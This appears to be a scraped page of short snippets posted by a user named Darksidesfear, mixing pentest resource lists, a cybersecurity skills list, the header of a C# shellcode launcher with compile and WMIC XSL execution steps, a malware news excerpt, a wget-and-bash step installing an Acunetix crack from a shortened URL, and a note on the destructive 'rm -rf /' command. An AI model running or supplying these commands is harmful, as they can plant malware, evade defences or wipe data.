Darksidesfear

Ultimate Resource List

• CLI Tools
• GUI Tools
• Web Tools
• Systems/Services
• Networks
• Containers/Orchestration
• Manuals/Howtos/Tutorials

Darksidesfear

Awesome Penetration Testing

A collection of awesome penetration testing resources.

Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities.

Your contributions and suggestions are heartily♥ welcome. (✿◕‿◕). Please check the Contributing Guidelines for more details. This work is licensed under a Creative Commons Attribution 4.0 International License.

This project is supported by Netsparker Web Application Security Scanner

Darksidesfear

Basic knowledge requirements for cybersecurity and hacking

These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby:

1. Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols  IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4)
2. Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports
3. Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes  How HTTP maintains stat

Darksidesfear

   ++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
These are the basic competencies expected (and tested for during the 1st in person interview) by a large, very visible InfoSec company I think it is a good base competency list for anyone looking to get into an Infosec career (with specialization plus and some programming /scripting ability) or learn cybersecurity/hacking as a hobby:

Networking: Good understanding of OSI layer model / Understating of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding Layer 3 & Layer 4 protocols  IP, ICMP Protocols (layer 3) TCP, UDP Protocols (layer 4)

Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports

Understanding of major (everyday Layer 7) services/protocols: DNS o DHCP o HTTP HTTP Header Fields HTTP Status Codes  How HTTP mainta

Darksidesfear

#!/bin/bash 
# Web Application Pentest
clear 
echo "[!] Don't Run It As Root Never [!]"
sleep 2
mkdir ~/Tools/Web-Application-Pentest
cd ~/Tools/Web-Application-Pentest
# --------------------------------- #
mkdir ~/Tools/Web-Application-Pentest/Domain-Finding-Enum
mkdir ~/Tools/Web-Application-Pentest/General-Recon

Darksidesfear

// Template taken from https://github.com/infosecn1nja/MaliciousMacroMSBuild/blob/master/templates/MSBuild_shellcode.csproj
// Compile: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.exe /platform:x86 /unsafe mylauncher.cs
// Or as dll: C:\windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:c:\test.dll /platform:x86 /target:library /unsafe mylauncher.cs
//  Then DotNetToJScript.exe -v Auto -l JScript -o mylauncher.js -c ShellCodeLauncher.Program c:\test.dll
//  mylauncher.js can be put into something like a WMIC XSL template like so...

/*
// wmic-template.xsl
// wmic os get /format:wmic-template.xsl (if you create x86 shellcode, need to use x86 version of wmic here - c:\windows\syswow64\wbem\wmic.exe)

Darksidesfear

North Korean Cyber-Attacks and Collateral Damage
February 15, 2018  |  Chris Doman
WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars.

There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions.

Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK.

The Voice of Korea and the Rivts Virus
This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet.

Darksidesfear

import socket
import hashlib
import struct

import time



class IdUid:
    def __init__(self):

Darksidesfear

Install crack

Mỗi lần chạy thì chạy nó 1 lần lệnh bash bên dưới

wget -O acunetix.sh https://l.manhtuong.net/3q1vOHs 

bash acunetix.sh vouu/acuss:14.7.220228146

Darksidesfear

There are plenty of one line terminal commands that can prove to be exorbitantly dangerous.

1. The Delete Everything Command

    rm -rf /

This command deletes everything it possibly can, including files on your hard drive and files on connected removable media devices. This command can be explained as follows:

    rm – Remove the following files.
    -rf – Run rm recursively.